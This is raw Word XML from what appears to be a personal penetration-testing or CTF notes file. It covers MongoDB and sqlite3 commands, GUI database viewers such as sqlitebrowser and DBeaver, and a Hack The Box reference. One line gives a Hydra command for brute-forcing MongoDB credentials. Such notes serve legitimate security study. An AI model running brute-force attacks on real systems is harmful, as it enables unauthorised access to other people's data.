        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.&lt;collection-name&gt;.insert({key: "value"})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="138"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">db.&lt;collection-name&gt;.remove({})</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B1F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If authentication is enabled, brute-force credentials using tools like `Hydra`:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B20">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1239"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hydra -l &lt;username&gt; -P &lt;password-list&gt; mongodb://&lt;target-ip&gt;:27017</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B21">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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25">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mmnkbcgjz8a5" w:id="222"/>
      <w:bookmarkEnd w:id="222"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to view .db files using sqlitebrowser (GUI)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B26">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B27">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you have a .db file, instead of viewing using sqlite3, you can download a GUI tool</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B28">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B29">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt update &amp;&amp; sudo apt install sqlitebrowser</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And then use it to view the .db file!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2C">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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2E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B2F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ge2lfj23vxri" w:id="223"/>
      <w:bookmarkEnd w:id="223"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B30">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you want a GUI interface, look at the section above</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B31">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B32">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to dump contents:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3 database.db .dump</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B34">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="94"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:hyperlink r:id="rId543">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Cascade HTB</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> which got password from it</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B35">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B36">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Access the database:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B37">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="271"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sqlite3 database_name.db</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B38">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B39">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Showing tables:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="866"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.tables</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3B">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Viewing Schema (the structure of a table):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.schema users</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1154"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users is the table name.sg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B3F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Getting help:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="332"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.help</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B42">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B43">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Query data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B44">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT * FROM users;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B45">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1339"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">users is the name of the table</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B46">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B47">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Update/modify data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="812"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">UPDATE users SET age = 31 WHERE name = 'Alice';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B49">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Deleting Data:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="896"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DELETE FROM users WHERE name = 'Bob';</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4C">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exiting:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B4E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>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1B4F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1074"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.quit</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B50">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B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52">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_foz7tx8s337o" w:id="224"/>
      <w:bookmarkEnd w:id="224"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dbeaver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B53">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B54">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Dbeaver is a GUI app for all things SQL related</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B55">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B56">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">By default, all the text was in white and so was the background, so I couldn't see anything. To turn on dark mode (which fixes this problem), do this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001B57">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to Window (on the top)</w:t>
      </w:r>
    </w:p>
